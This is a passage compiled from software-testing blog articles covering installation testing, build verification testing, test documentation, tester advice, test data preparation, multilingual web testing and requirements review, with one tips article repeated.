execute a single test case. If you are going to test a big application installer then think
about time required to perform such a many test cases on different configurations.
We will see different methods to perform manual installer testing and some basic
guideline for automating the installation process.
To start installation testing first decide on how many different system configurations you
want to test the installation. Prepare one basic hard disk drive. Format this HDD with most
common or default file system, install most common operating system (Windows) on this
HDD. Install some basic required components on this HDD. Each time create images of this
base HDD and you can create other configurations on this base drive. Make one set of each
configuration like Operating system and file format to be used for further testing.

How we can use automation in this process? Well make some systems dedicated for
creating basic images (use software’s like Norton Ghost for creating exact images of
operating system quickly) of base configuration. This will save your tremendous time in
each test case. For example if time to install one OS with basic configuration is say 1 hour
then for each test case on fresh OS you will require 1+ hour. But creating image of OS will
hardly require 5 to 10 minutes and you will save approximately 40 to 50 minutes!

You can use one operating system with multiple attempts of installation of installer. Each
time uninstalling the application and preparing the base state for next test case. Be careful
here that your uninstallation program should be tested before and should be working fine.

Installation testing tips with some broad test


cases:
1) Use flow diagrams to perform installation
testing. Flow diagrams simplify our task. See
example flow diagram for basic installation testing
test case.
Add some more test cases on this basic flow chart
Such as if our application is not the first release then
try to add different logical installation paths.

2) If you have previously installed compact basic


version of application then in next test case install
the full application version on the same path as
used for compact version.
3) If you are using flow diagram to test
different files to be written on disk while
installation then use the same flow diagram in
reverse order to test uninstallation of all the
installed files on disk.
4) Use flow diagrams toautomate the testing efforts. It will be very easy to convert
diagrams into automated scripts.
5) Test the installer scripts used for checking the required disk space. If installer is
prompting required disk space 1MB, then make sure exactly 1MB is used or whether more
disk space utilized during installation. If yes flag this as error.
6) Test disk space requirement on different file system format. Like FAT16 will require more
space than efficient NTFS or FAT32 file systems.
7) If possible set a dedicated system for only creating disk images. As said above this will
save your testing time.
8 ) Use distributed testing environment in order to carry out installation testing.
Distributed environment simply save your time and you can effectively manage all the
different test cases from a single machine. The good approach for this is to create a master
machine, which will drive different slave machines on network. You can start installation
simultaneously on different machine from the master system.
9) Try to automate the routine to test the number of files to be written on disk. You can
maintain this file list to be written on disk in and excel sheet and can give this list as a input
to automated script that will check each and every path to verify the correct installation.
10) Use software’s available freely in market to verify registry changes on successful
installation. Verify the registry changes with your expected change list after installation.
11) Forcefully break the installation process in between. See the behavior of system
and whether system recovers to its original state without any issues. You can test this
“break of installation” on every installation step.
12) Disk space checking: This is the crucial checking in the installation-testing scenario.
You can choose different manual and automated methods to do this checking. In manual
methods you can check free disk space available on drive before installation and disk space
reported by installer script to check whether installer is calculating and reporting disk space
accurately. Check the disk space after the installation to verify accurate usage of installation
disk space. Run various combination of disk space availability by using some tools to
automatically making disk space full while installation. Check system behavior on low disk
space conditions while installation.
13) As you check installation you can test for uninstallation also. Before each new
iteration of installation make sure that all the files written to disk are removed after
uninstallation. Some times uninstallation routine removes files from only last upgraded
installation keeping the old version files untouched. Also check for rebooting option after
uninstallation manually and forcefully not to reboot.
I have addressed many areas of manual as well as automated installation testing
procedure. Still there are many areas you need to focus on depending on the complexity of
your software under installation. These not addressed important tasks includesinstallation
over the network, online installation, patch installation, Database checking on
Installation, Shared DLL installation and uninstallation etc.
Hope this article will be a basic guideline to those having trouble to start with software
installation testing both manually or in automation.

If you like this article you would also like to subscribe to our email newsletter.

What you need to know about BVT (Build


Verification Testing)
What is BVT?
Build Verification test is a set of tests run on every new build to verify that build is testable
before it is released to test team for further testing. These test cases are core functionality
test cases that ensure application is stable and can be tested thoroughly. Typically BVT
process is automated. If BVT fails that build is again get assigned to developer for fix.

BVT is also called smoke testing or build acceptance testing (BAT)

New Build is checked mainly for two things:


• Build validation
• Build acceptance
Some BVT basics:
• It is a subset of tests that verify main functionalities.
• The BVT’s are typically run on daily builds and if the BVT fails the build is rejected
and a new build is released after the fixes are done.
• The advantage of BVT is it saves the efforts of a test team to setup and test a build
when major functionality is broken.
• Design BVTs carefully enough to cover basic functionality.
• Typically BVT should not run more than 30 minutes.
• BVT is a type of regression testing, done on each and every new build.
BVT primarily checks for the project integrity and checks whether all the modules are
integrated properly or not. Module integration testing is very important when different
teams develop project modules. I heard many cases of application failure due to improper
module integration. Even in worst cases complete project gets scraped due to failure in
module integration.

What is the main task in build release? Obviously file ‘check in’ i.e. to include all the
new and modified project files associated with respective builds. BVT was primarily
introduced to check initial build health i.e. to check whether – all the new and modified files
are included in release, all file formats are correct, every file version and language, flags
associated with each file.
These basic checks are worth before build release to test team for testing. You will save
time and money by discovering the build flaws at the very beginning using BVT.
Which test cases should be included in BVT?
This is very tricky decision to take before automating the BVT task. Keep in mind that
success of BVT depends on which test cases you include in BVT.

Here are some simple tips to include test cases in your BVT automation suite:
• Include only critical test cases in BVT.
• All test cases included in BVT should be stable.
• All the test cases should have known expected result.
• Make sure all included critical functionality test cases are sufficient for application
test coverage.
Also do not includes modules in BVT, which are not yet stable. For some under-development
features you can’t predict expected behavior as these modules are unstable and you might
know some known failures before testing for these incomplete modules. There is no point
using such modules or test cases in BVT.

You can make this critical functionality test cases inclusion task simple by communicating
with all those involved in project development and testing life cycle. Such process should
negotiate BVT test cases, which ultimately ensure BVT success. Set some BVT quality
standards and these standards can be met only by analyzing major project features and
scenarios.

Example: Test cases to be included in BVT for Text editor application (Some sample
tests only):
1) Test case for creating text file.
2) Test cases for writing something into text editor
3) Test case for copy, cut, paste functionality of text editor
4) Test case for opening, saving, deleting text file.
These are some sample test cases, which can be marked as ‘critical’ and for every minor or
major changes in application these basic critical test cases should be executed. This task
can be easily accomplished by BVT.

BVT automation suits needs to be maintained and modified time-to-time. E.g. include test
cases in BVT when there are new stable project modules available.

What happens when BVT suite run:


Say Build verification automation test suite executed after any new build.
1) The result of BVT execution is sent to all the email ID’s associated with that project.
2) The BVT owner (person executing and maintaining the BVT suite) inspects the result of
BVT.
3) If BVT fails then BVT owner diagnose the cause of failure.
4) If the failure cause is defect in build, all the relevant information with failure logs is sent
to respective developers.
5) Developer on his initial diagnostic replies to team about the failure cause. Whether this is
really a bug? And if it’s a bug then what will be his bug-fixing scenario.
6) On bug fix once again BVT test suite is executed and if build passes BVT, the build is
passed to test team for further detail functionality, performance and other testes.
This process gets repeated for every new build.

Why BVT or build fails?


BVT breaks sometimes. This doesn’t mean that there is always bug in the build. There are
some other reasons to build fail like test case coding error, automation suite error,
infrastructure error, hardware failures etc.
You need to troubleshoot the cause for the BVT break and need to take proper action after
diagnosis.
Tips for BVT success:
1) Spend considerable time writing BVT test cases scripts.
2) Log as much detailed info as possible to diagnose the BVT pass or fail result. This will
help developer team to debug and quickly know the failure cause.
3) Select stable test cases to include in BVT. For new features if new critical test case
passes consistently on different configuration then promote this test case in your BVT suite.
This will reduce the probability of frequent build failure due to new unstable modules and
test cases.
4) Automate BVT process as much as possible. Right from build release process to BVT
result – automate everything.
5) Have some penalties for breaking the build Some chocolates or team coffee party
from developer who breaks the build will do.
Conclusion:
BVT is nothing but a set of regression test cases that are executed each time for new build.
This is also called as smoke test. Build is not assigned to test team unless and until the BVT
passes. BVT can be run by developer or tester and BVT result is communicated throughout
the team and immediate action is taken to fix the bug if BVT fails. BVT process is typically
automated by writing scripts for test cases. Only critical test cases are included in BVT.
These test cases should ensure application test coverage. BVT is very effective for daily as
well as long term builds. This saves significant time, cost, resources and after all no
frustration of test team for incomplete build.

10 Tips to Help You Achieve Your Software


Testing Documentation Goal
April 18th, 2010 — Basics of Software testing, Manual Testing, Quality assurance, Testing best practices
Note: If you missed the first part of this post please read it: Why Documentation is
important in testing?
As I mention in my earlier post, in general, understanding about software testing
documentation is “It can be done only by the person who has free time”. We need to
change this mindset, and then only we can leverage documentation power on our projects.

It’s not that we don’t know how to do the documentation right. We just don’t think it’s
important.

Everyone must have standard templates for all the kinds of documentation starting from
Test strategy, test Plan, Test cases, and Test data to Bug report. These are just to follow
some standards (CMMI, ISO etc.) but, when it comes to actual implementation how many of
these documents are really used by us? We just need to synchronize our quality process
with documentation standards and other process in an organization.
Continue reading →
30 Comments

Why Documentation is Important in Software


Testing
March 7th, 2010 — Manual Testing, Testing best practices

This is a guest article by ‘Tejaswini patil’ – Associate QA Manager.


In my Software Testing career, I never heard people talking much about software testing
documentation. The general opinion about testing documentation is that, anyone who has
free time can do the documentation like Test case, Test plan, status report, Bug report,
project proposal etc.

Even I did not stress more on the documentation, but I can say it’s my habit to place all the
data in black and white and to update others about that as well.

Just want to share my experience with you:


We had delivered a project (with an unknown issue in that) to one of our client (angry
client). And they found issue at Client side, which was very bad situation for us, and as
usual all blame was on QA’s. The Continue reading →
83 Comments
Software Testing Advice for Novice Testers
December 11th, 2008 — Career in software Testing, How to be a good tester,Testing Tips and

resources, Testing best practices

Novice testers have many questions about software testing and the actual work that they
are going to perform. As novice testers, you should be aware of certain facts in the
software testing profession. The tips below will certainly help to advance you in your
software-testing career. These ‘testing truths’ are applicable to and helpful for
experienced testing professionals as well. Apply each and every testing truth mentioned
below in your career and you will never regret what you do.
Know Your Application
Don’t start testing without understanding the requirements. If you test without knowledge
of the requirements, you will not be able to determine if a program is functioning as
designed and you will not be able to tell if required functionality is missing. Clear
knowledge of requirements, before starting testing, is a must for any tester.
Know Your Domain
As I have said many times, you should acquire a thorough knowledge of the domain on
which you are working. Knowing the domain will help you suggest good bug solutions.
Your test manager will appreciate your suggestions, if you have valid points to make. Don’t
stop by only logging the bug. Provide solutions as well. Good domain knowledge will also
help you to design better test cases with maximum test coverage. For more guidance on
acquiring domain knowledge, read this post.
No Assumptions In Testing
Don’t start testing with the assumption that there will be no errors. As a tester, you should
always be looking for errors.
Learn New Technologies
No doubt, old testing techniques still play a vital role in day-to-day testing, but try to
introduce new testing procedures that work for you. Don’t rely on book knowledge. Be
practical. Your new testing ideas may work amazingly for you.
You Can’t Guarantee a Bug Free Application
No matter how much testing you perform, you can’t guarantee a 100% bug free
application. There are some constraints that may force your team to advance a product to
the next level, knowing some common or low priority issues remain. Try to explore as many
bugs as you can, but prioritize your efforts on basic and crucial functions. Put your best
efforts doing good work.
Think Like An End User
This is my top piece of advice. Don’t think only like a technical guy. Think like customers
or end users. Also, always think beyond your end users. Test your application as an end
user. Think how an end user will be using your application. Technical plus end user
thinking will assure that your application is user friendly and will pass acceptance tests
easily. This was the first advice to me from my test manager when I was a novice tester.
100% Test Coverage Is Not Possible
Don’t obsess about 100% test coverage. There are millions of inputs and test combinations
that are simply impossible to cover. Use techniques like boundary value analysis and
equivalence partitioning testing to limit your test cases to manageable sizes.
Build Good Relations With Developers
As a tester, you communicate with many other team members, especially developers. There
are many situations where tester and developer may not agree on certain points. It will
take your skill to handle such situations without harming a good relationship with the
developer. If you are wrong, admit it. If you are right, be diplomatic. Don’t take it
personally. After all, it is a profession, and you both want a good product.
Learn From Mistakes
As a novice, you will make mistakes. If you don’t make mistakes, you are not testing hard
enough! You will learn things as you get experience. Use these mistakes as your learning
experience. Try not to repeat the same mistakes. It hurts when the client files any bug in
an application tested by you. It is definitely an embracing situation for you and cannot be
avoided. However, don’t beat yourself up. Find the root cause of the failure. Try to find out
why you didn’t find that bug, and avoid the same mistake in the future. If required, change
some testing procedures you are following.
Don’t Underestimate Yourself if Some of Your bugs Are Not Fixed
Some testers have assumptions that all bugs logged by them should get fixed. It is a good
point to a certain level but you must be flexible according to the situation. All bugs may or
may not be fixed. Management can defer bugs to fix later as some bugs have low priority,
low severity or no time to fix. Over time you will also learn which bugs can be deferred
until the next release. Read article on ‘How to get all your bugs resolved‘.
Over To You:
If you are an experienced tester, what advice do you like to give to novice testers?
85 Comments
Top 20 practical software testing tips you should
read before testing any application.
September 29th, 2008 — Testing Skill Improvement, Testing Tips and resources,Testing best practices

I wish all testers read these software testing good practices.Read all points carefully
and try to implement them in your day-to-day testing activities. This is what I expect from
this article. If you don’t understand any testing practice, ask for more clarification in
comments below. After all you will learn all these testing practices by experience. But
then why not to learn all these things before making any mistake?
Here are some of the best testing practices I learned by experience:
1) Learn to analyze your test results thoroughly. Do not ignore the test result. The
final test result may be ‘pass’ or ‘fail’ but troubleshooting the root cause of ‘fail’ will lead you
to the solution of the problem. Testers will be respected if they not only log the bugsbut also
provide solutions.
2) Learn to maximize the test coverage every time you test any application. Though
100 percent test coverage might not be possible still you can always try to reach near it.
3) To ensure maximum test coverage break your application under test (AUT) into
smaller functional modules. Write test cases on such individual unit modules. Also if
possible break these modules into smaller parts.
E.g: Lets assume you have divided your website application in modules and ‘accepting user
information’ is one of the modules. You can break this ‘User information’ screen into smaller
parts for writing test cases: Parts like UI testing, security testing, functional testing of the
‘User information’ form etc. Apply all form field type and size tests, negative and validation
tests on input fields and write all such test cases for maximum coverage.
4) While writing test cases, write test cases for intended functionality first i.e. for valid
conditions according to requirements. Then write test cases for invalid conditions. This will
cover expected as well unexpected behavior of application under test.
5) Think positive. Start testing the application by intend of finding bugs/errors. Don’t
think beforehand that there will not be any bugs in the application. If you test the
application by intention of finding bugs you will definitely succeed to find those subtle
bugs also.
6) Write your test cases in requirement analysis and design phase itself. This way you can
ensure all the requirements are testable.
7) Make your test cases available to developers prior to coding.Don’t keep your test
cases with you waiting to get final application release for testing, thinking that you can log
more bugs. Let developers analyze your test cases thoroughly to develop quality
application. This will also save the re-work time.
8 ) If possible identify and group your test cases for regression testing. This will
ensure quick and effective manual regression testing.
9) Applications requiring critical response time should be thoroughly tested for
performance. Performance testing is the critical part of many applications. In manual
testing this is mostly ignored part by testers due to lack of required performance testing
large data volume. Find out ways to test your application for performance. If not possible to
create test data manually then write some basic scripts to create test data for performance
test or ask developers to write one for you.
10) Programmers should not test their own code. As discussed in our previous post,
basic unit testing of developed application should be enough for developers to release the
application for testers. But you (testers) should not force developers to release the product
for testing. Let them take their own time. Everyone from lead to manger know when the
module/update is released for testing and they can estimate the testing time accordingly.
This is a typical situation in agile project environment.
11) Go beyond requirement testing. Test application for what it is not supposed to do.
12) While doing regression testing use previous bug graph (Bug graph – number of bugs
found against time for different modules). This module-wise bug graph can be useful to
predict the most probable bug part of the application.
13) Note down the new terms, concepts you learn while testing. Keep a text file open while
testing an application. Note down the testing progress, observations in it. Use these
notepad observations while preparing final test release report. This good habit will help you
to provide the complete unambiguous test report and release details.
14) Many times testers or developers make changes in code base for application under test.
This is required step in development or testing environment to avoid execution of live
transaction processing like in banking projects. Note down all such code changes done
for testing purpose and at the time of final release make sure you have removed all these
changes from final client side deployment file resources.
15) Keep developers away from test environment. This is required step to detect any
configuration changes missing in release or deployment document. Some times developers
do some system or application configuration changes but forget to mention those in
deployment steps. If developers don’t have access to testing environment they will not do
any such changes accidentally on test environment and these missing things can be
captured at the right place.
16) It’s a good practice to involve testers right from software requirement and
design phase. These way testers can get knowledge of application dependability resulting
in detailed test coverage. If you are not being asked to be part of this development cycle
then make request to your lead or manager to involve your testing team in all decision
making processes or meetings.
17) Testing teams should share best testing practices, experience with other teams in
their organization.
18) Increase your conversation with developers to know more about the product.
Whenever possible make face-to-face communication for resolving disputes quickly and to
avoid any misunderstandings. But also when you understand the requirement or resolve any
dispute – make sure to communicate the same over written communication ways like
emails. Do not keep any thing verbal.
19) Don’t run out of time to do high priority testing tasks.Prioritize your testing work
from high to low priority and plan your work accordingly. Analyze all associated risks to
prioritize your work.
20) Write clear, descriptive, unambiguous bug report. Do not only provide the bug
symptoms but also provide the effect of the bug and all possible solutions.
Don’t forget testing is a creative and challenging task. Finally it depends on your skill and
experience, how you handle this challenge.

Over to you:
Sharing your own testing experience, tips or testing secrets in comments below will
definitely make this article more interesting and helpful!!

If you are not regular reader of this website then highly recommend you to sign up for our
free email newsletter! Sign up just providing your email address below:
Top of Form

Enter your email address:

Subscribe

Bottom of Form

146 Comments

Developers are not good testers. What you say?


August 7th, 2008 — Tester vs Developer, Testing best practices
This can be a big debate. Developers testing their own code – what will be the testing
output? All happy endings! Yes, the person who develops the code generally sees
only happy paths of the product and don’t want to go in much details.
The main concern of developer testing is – misunderstanding of requirements. If
requirements are misunderstood by developer then no matter at what depth developer test
the application, he will never find the error. The first place where the bug gets introduced
will remain till end, as developer will see it as functionality.
Optimistic developers – Yes, I wrote the code and I am confident it’s working properly.
No need to test this path, no need to test that path, as I know it’s working properly. And
right here developers skip the bugs.
Developer vs Tester: Developer always wants to see his code working properly. So he will
test it to check if it’s working correctly. But you know why tester will test the application? To
make it fail in any way, and tester surely will test how application is not working correctly.
This is the main difference in developer testing and tester testing.
Should developers test their own work?
I personally don’t mind developers testing their
own code. After all it’s there baby They know their
code very well. They know what are the traps in their
codes. Where it can fail, where to concentrate more,
which is important path of the application. Developer
can do unit testing very well and can effectively identify
boundary cases. (Image credit)
This is all applicable to a developer who is a good
tester! But most of the developers consider testing as
painful job, even they know the system well, due to
their negligence they tend to skip many testing paths, as it’s a very painful experience for
them. If developers find any errors in their code in unit testing then it’s comparatively
easier to fix, as the code is fresh to them, rather than getting the bug from testers after
two-three days. But this only possible if the developer is interested in doing that much
testing.
It’s testers responsibility to make sure each and every path is tested or not. Testers
should ideally give importance to all small possible details to verify application is not
breaking anywhere.
Developers, please don’t review your own code. Generally you will overlook the issues in
your code. So give it to others for review.
Everyone is having specialization in particular subject. Developers generally think how to
develop the application on the other hand testers think how the end user is going to use the
application.

Conclusion
So in short there is no problem if developers are doing the basic unit testing and
basic verification testing. Developers can test few exceptional conditions they know are
critical and should not be missed. But there are some great testers out there. Through the
build to test team. Don’t waste your time as well. For success of any project there should be
independent testing team validating your applications. After all it’s our (testers)
responsibility to make the ‘baby’ smarter!!
What you say?

Tips to design test data before executing your test


cases
I have mentioned importance of proper test data in many of my previous articles. Tester
should check and update the test data before execution of any test case. In this article I will
provide tips on how to prepare test environment so that any important test case
will not be missed by improper test data and incomplete test environment setup.

What do I mean by test data?


If you are writing test case then you need input data for any kind of test. Tester may
provide this input data at the time of executing the test cases or application may pick the
required input data from the predefined data locations. The test data may be any kind of
input to application, any kind of file that is loaded by the application or entries read from
the database tables. It may be in any format like xml test data, system test data, SQL test
data or stress test data.

Preparing proper test data is part of the test setup. Generally testers call it as testbed
preparation. In testbed all software and hardware requirements are set using the predefined
data values.
If you don’t have the systematic approach for building test data whilewriting and executing
test cases then there are chances of missing some important test cases. Tester can’t justify
any bug saying that test data was not available or was incomplete. It’s every testers
responsibility to create his/her own test data according to testing needs. Don’t even rely on
the test data created by other tester or standard production test data, which might not have
been updated for months! Always create fresh set of your own test data according to your
test needs.
Sometime it’s not possible to create complete new set of test data for each and every build.
In such cases you can use standard production data. But remember to add/insert your own
data sets in this available database. One good way to design test data is use the existing
sample test data or testbed and append your new test case data each time you get same
module for testing. This way you can build comprehensive data set.

How to keep your data intact for any test environment?


Many times more than one tester is responsible for testing some builds. In this case more
than one tester will be having access to common test data and each tester will try to
manipulate that common data according to his/her own needs. Best way to keep your
valuable input data collection intact is to keep personal copies of the same data. It may be
of any format like inputs to be provided to the application, input files such as word file,
excel file or other photo files.

Check if your data is not corrupted:


Filing a bug without proper troubleshooting is bad a practice. Before executing any test case
on existing data make sure that data is not corrupted and application can read the data
source.

How to prepare data considering performance test cases?


Performance tests require very large data set. Particularly if application fetching or updating
data from DB tables then large data volume play important role while testing such
application for performance. Sometimes creating data manually will not detect some subtle
bugs that may only be caught by actual data created by application under test. If you want
real time data, which is impossible to create manually, then ask your manager to make it
available from live environment.

I generally ask to my manager if he can make live environment data available for testing.
This data will be useful to ensure smooth functioning of application for all valid inputs.

Take example of my search engine project ‘statistics testing’. To check history of


user searches and clicks on advertiser campaigns large data was processed for several
years which was practically impossible to manipulate manually for several dates spread over
many years. So there is no other option than using live server data backup for testing. (But
first make sure your client is allowing you to use this data)
What is the ideal test data?
Test data can be said to be ideal if for the minimum size of data set all the application errors
get identified. Try to prepare test data that will incorporate all application functionality, but
not exceeding cost and time constraint for preparing test data and running tests.

How to prepare test data that will ensure complete test coverage?
Design your test data considering following categories:
Test data set examples:
1) No data: Run your test cases on blank or default data. See if proper error messages are
generated.
2) Valid data set: Create it to check if application is functioning as per requirements and
valid input data is properly saved in database or files.
3) Invalid data set: Prepare invalid data set to check application behavior for negative
values, alphanumeric string inputs.
4) Illegal data format: Make one data set of illegal data format. System should not accept
data in invalid or illegal format. Also check proper error messages are generated.
5) Boundary Condition data set: Data set containing out of range data. Identify
application boundary cases and prepare data set that will cover lower as well as upper
boundary conditions.
6) Data set for performance, load and stress testing: This data set should be large in
volume.
This way creating separate data sets for each test condition will ensure complete test
coverage.

Conclusion:
Preparing proper test data is a core part of “project test environment setup”. Tester cannot
pass the bug responsibility saying that complete data was not available for testing. Tester
should create his/her own test data additional to the existing standard production data. Your
test data set should be ideal in terms of cost and time. Use the tips provided in this article
to categorize test data to ensure complete functional test cases coverage.

Be creative, use your own skill and judgments to create different data sets instead of relying
on standard production data while testing.

What is your experience?


Have you faced problem of incomplete data for testing? How you managed to create your
own data then? Share your simple tips and tricks to create or use test data.

Like This post? Get all article updates in your inbox. Click here to register just giving
your email ID.
7 basThis is a guest article by: Inder P Singh
These days a number of web sites are deployed in multiple languages. As companies
perform more and more business in other countries, the number of such global multi-lingual
web applications will continue to increase.

Testing web sites supporting multiple languages has its own fair share of challenges. In this
article,I will share seven tips with you that will enable you to test the multi-lingual
browser-based applications in a complete way:
Tip # 1 – Prepare and use the required test environment
If a web site is hosted in English and Japanese languages, it is not enough to simply change
the default browser language and perform identical tests in both the languages. Depending
on its implementation, a web site may figure out the correct language for its interface from
the browser language setting, the regional and language settings of the machine, a
configuration in the web application or other factors. Therefore, in order to perform a
realistic test, it is imperative that the web site be tested from two machines – one with the
English operating system and one with the Japanese operating system. You might want to
keep the default settings on each machine since many users do not change the default
settings on their machines.

Tip # 2 – Acquire correct translations


A native speaker of the language, belonging to the same region as the users, is usually
the best resource to provide translations that are accurate in both meaning as well as
context. If such a person is not available to provide you the translations of the text, you
might have to depend on automated web translations available on web sites like
wordreference.com and dictionary.com. It is a good idea to compare automated translations
from multiple sources before using them in the test.
Tip # 3 – Get really comfortable with the application
Since you might not know the languages supported by the web site, it is always a good idea
for you to be very conversant with the functionality of the web site. Execute the test cases
in the English version of the site a number of times. This will help you find your way easily
within the other language version. Otherwise, you might have to keep the English version of
the site open in another browser in order to figure out how to proceed in the other language
version (and this could slow you down).

Tip # 4 – Start with testing the labels


You could start testing the other language version of the web site by first looking at all the
labels. Labels are the more static items in the web site. English labels are usually short and
translated labels tend to expand. It is important to spot any issues related to label
truncation, overlay on/ under other controls, incorrect word wrapping etc. It is even more
important to compare the labels with their translations in the other language.
Tip # 5 – Move on to the other controls
Next, you could move on to checking the other controls for correct translations and any user
interface issues. It is important that the web site provides correct error messages in the
other language. The test should include generating all the error messages. Usually for
any text that is not translated, three possibilities exist. The text will be missing or its English
equivalent will be present or you will see junk characters in its place.
Tip # 6 – Do test the data
Usually, multi-lingual web sites store the data in the UTF-8 Unicode encoding format. To
check the character encoding for your website in mozilla: go to View -> Character Encoding
and in IE go to View -> Encoding. Data in different languages can be easily represented in
this format. Make sure to check the input data. It should be possible to enter data in the
other language in the web site. The data displayed by the web site should be correct. The
output data should be compared with its translation.

Tip # 7 – Be aware of cultural issues


A challenge in testing multi-lingual web sites is that each language might be meant for
users from a particular culture. Many things such as preferred (and not preferred) colors,
text direction (this can be left to right, right to left or top to bottom), format of
salutations and addresses, measures, currency etc. are different in different cultures.
Not only should the other language version of the web site provide correct translations,
other elements of the user interface e.g. text direction, currency symbol, date format etc.
should also be correct.
As you might have gathered from the tips given above, using the correct test
environment and acquiring correct translations is critical in performing a successful
test of other language versions of a web site.

Top 20 practical software testing tips you should


read before testing any application.
I wish all testers read these software testing good practices. Read all points carefully
and try to implement them in your day-to-day testing activities. This is what I expect from
this article. If you don’t understand any testing practice, ask for more clarification in
comments below. After all you will learn all these testing practices by experience. But
then why not to learn all these things before making any mistake?
Here are some of the best testing practices I learned by experience:
1) Learn to analyze your test results thoroughly. Do not ignore the test result. The
final test result may be ‘pass’ or ‘fail’ but troubleshooting the root cause of ‘fail’ will lead you
to the solution of the problem. Testers will be respected if they not only log the bugsbut also
provide solutions.
2) Learn to maximize the test coverage every time you test any application. Though
100 percent test coverage might not be possible still you can always try to reach near it.
3) To ensure maximum test coverage break your application under test (AUT) into
smaller functional modules. Write test cases on such individual unit modules. Also if
possible break these modules into smaller parts.
E.g: Lets assume you have divided your website application in modules and ‘accepting user
information’ is one of the modules. You can break this ‘User information’ screen into smaller
parts for writing test cases: Parts like UI testing, security testing, functional testing of the
‘User information’ form etc. Apply all form field type and size tests, negative and validation
tests on input fields and write all such test cases for maximum coverage.
4) While writing test cases, write test cases for intended functionality first i.e. for valid
conditions according to requirements. Then write test cases for invalid conditions. This will
cover expected as well unexpected behavior of application under test.
5) Think positive. Start testing the application by intend of finding bugs/errors. Don’t
think beforehand that there will not be any bugs in the application. If you test the
application by intention of finding bugs you will definitely succeed to find those subtle
bugs also.
6) Write your test cases in requirement analysis and design phase itself. This way you can
ensure all the requirements are testable.
7) Make your test cases available to developers prior to coding.Don’t keep your test
cases with you waiting to get final application release for testing, thinking that you can log
more bugs. Let developers analyze your test cases thoroughly to develop quality
application. This will also save the re-work time.
8 ) If possible identify and group your test cases for regression testing. This will
ensure quick and effective manual regression testing.
9) Applications requiring critical response time should be thoroughly tested for
performance. Performance testing is the critical part of many applications. In manual
testing this is mostly ignored part by testers due to lack of required performance testing
large data volume. Find out ways to test your application for performance. If not possible to
create test data manually then write some basic scripts to create test data for performance
test or ask developers to write one for you.
10) Programmers should not test their own code. As discussed in our previous post,
basic unit testing of developed application should be enough for developers to release the
application for testers. But you (testers) should not force developers to release the product
for testing. Let them take their own time. Everyone from lead to manger know when the
module/update is released for testing and they can estimate the testing time accordingly.
This is a typical situation in agile project environment.
11) Go beyond requirement testing. Test application for what it is not supposed to do.
12) While doing regression testing use previous bug graph (Bug graph – number of bugs
found against time for different modules). This module-wise bug graph can be useful to
predict the most probable bug part of the application.
13) Note down the new terms, concepts you learn while testing. Keep a text file open while
testing an application. Note down the testing progress, observations in it. Use these
notepad observations while preparing final test release report. This good habit will help you
to provide the complete unambiguous test report and release details.
14) Many times testers or developers make changes in code base for application under test.
This is required step in development or testing environment to avoid execution of live
transaction processing like in banking projects. Note down all such code changes done
for testing purpose and at the time of final release make sure you have removed all these
changes from final client side deployment file resources.
15) Keep developers away from test environment. This is required step to detect any
configuration changes missing in release or deployment document. Some times developers
do some system or application configuration changes but forget to mention those in
deployment steps. If developers don’t have access to testing environment they will not do
any such changes accidentally on test environment and these missing things can be
captured at the right place.
16) It’s a good practice to involve testers right from software requirement and
design phase. These way testers can get knowledge of application dependability resulting
in detailed test coverage. If you are not being asked to be part of this development cycle
then make request to your lead or manager to involve your testing team in all decision
making processes or meetings.
17) Testing teams should share best testing practices, experience with other teams in
their organization.
18) Increase your conversation with developers to know more about the product.
Whenever possible make face-to-face communication for resolving disputes quickly and to
avoid any misunderstandings. But also when you understand the requirement or resolve any
dispute – make sure to communicate the same over written communication ways like
emails. Do not keep any thing verbal.
19) Don’t run out of time to do high priority testing tasks.Prioritize your testing work
from high to low priority and plan your work accordingly. Analyze all associated risks to
prioritize your work.
20) Write clear, descriptive, unambiguous bug report. Do not only provide the bug
symptoms but also provide the effect of the bug and all possible solutions.
Don’t forget testing is a creative and challenging task. Finally it depends on your skill and
experience, how you handle this challenge.

Over to you:
Sharing your own testing experience, tips or testing secrets in comments below will
definitely make this article more interesting and helpful!!

How to test software requirements specification


(SRS)?
Do you know “Most of the bugs in software are due to incomplete or inaccurate
functional requirements?” The software code, doesn’t matter how well it’s written, can’t
do anything if there are ambiguities in requirements.
It’s better to catch the requirement ambiguities and fix them in early development life cycle.
Cost of fixing the bug after completion of development or product release is too high. So
it’s important to have requirement analysis and catch these incorrect requirements before
design specifications and project implementation phases of SDLC.

How to measure functional software requirement specification (SRS) documents?


Well, we need to define some standard tests to measure the requirements. Once each
requirement is passed through these tests you can evaluate and freeze the functional
requirements.
Let’s take an example. You are working on a web based application. Requirement is as
follows:
“Web application should be able to serve the user queries as early as possible”
How will you freeze the requirement in this case?
What will be your requirement satisfaction criteria? To get the answer, ask this question to
stakeholders: How much response time is ok for you?
If they say, we will accept the response if it’s within 2 seconds, then this is your
requirement measure. Freeze this requirement and carry the same procedure for next
requirement.
We just learned how to measure the requirements and freeze those in design,
implementation and testing phases.
Now let’s take other example. I was working on a web based project. Client (stakeholders)
specified the project requirements for initial phase of the project development. My manager
circulated all the requirements in the team for review. When we started discussion on these
requirements, we were just shocked! Everyone was having his or her own conception about
the requirements. We found lot of ambiguities in the ‘terms’ specified in requirement
documents, which later on sent to client for review/clarification.

Client used many ambiguous terms, which were having many different meanings, making it
difficult to analyze the exact meaning. The next version of the requirement doc from client
was clear enough to freeze for design phase.

From this example we learned “Requirements should be clear and consistent”


Next criteria for testing the requirements specification is “Discover missing
requirements”
Many times project designers don’t get clear idea about specific modules and they simply
assume some requirements while design phase. Any requirement should not be based on
assumptions. Requirements should be complete, covering each and every aspect of the
system under development.

Specifications should state both type of requirements i.e. what system should do and what
should not.
Generally I use my own method to uncover the unspecified requirements. When I read
the software requirements specification document (SRS), I note down my own
understanding of the requirements that are specified, plus other requirements SRS
document should supposed to cover. This helps me to ask the questions about unspecified
requirements making it clearer.
For checking the requirements completeness, divide requirements in three sections, ‘Must
implement’ requirements, requirements those are not specified but are ‘assumed’ and third
type is ‘imagination’ type of requirements. Check if all type of requirements are addressed
before software design phase.

Check if the requirements are related to the project goal.


Some times stakeholders have their own expertise, which they expect to come in system
under development. They don’t think if that requirement is relevant to project in hand.
Make sure to identify such requirements. Try to avoid the irrelevant requirements in first
phase of the project development cycle. If not possible ask the questions to stakeholders:
why you want to implement this specific requirement? This will describe the particular
requirement in detail making it easier for designing the system considering the future
scope.
But how to decide the requirements are relevant or not?
Simple answer: Set the project goal and ask this question: If not implementing this
requirement will cause any problem achieving our specified goal? If not, then this is
